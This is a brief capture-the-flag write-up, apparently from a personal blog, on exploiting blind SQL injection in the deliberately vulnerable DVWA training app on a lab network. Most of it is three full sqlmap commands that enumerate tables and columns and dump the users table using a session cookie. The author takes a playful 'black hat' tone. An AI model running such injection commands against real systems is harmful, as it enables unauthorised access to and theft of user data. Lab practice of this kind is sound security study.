DVWA BLIND Sqli

A recent event organized by the cyberstars and hosted at cyberranges platform had this challenge on web category that demanded the participants to exploit a blind sql injection and dump the database

On a case like this you don't really get output after sending a malicious query to the database thus the only option left is to evaluate the responses of the server . example sleep() function can demonstrate this perfectly.

i used sqlmap in this case so to dump the tables in dvwa:

sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=takjjumq4qqulljjiptu01c7a2" -p id -D dvwa --tables --dbms=mysql

change the session id cookie to your session id,you can find it by inspecting the page and clicking on storage .

Having the tables, as a Black hat i am interested in users table more than the guestbook.

To get the columns in users table:

sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=takjjumq4qqulljjiptu01c7a2" -p id -D dvwa -T users --columns --dbms=mysql

To dump the users information use this payload:

sqlmap -u "http://192.168.125.150/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=takjjumq4qqulljjiptu01c7a2" -p id -D dvwa -T users -C first_name,failed_login,last_name,user,user_id --dump --dbms=mysql

happy hacking :) Follow for more ...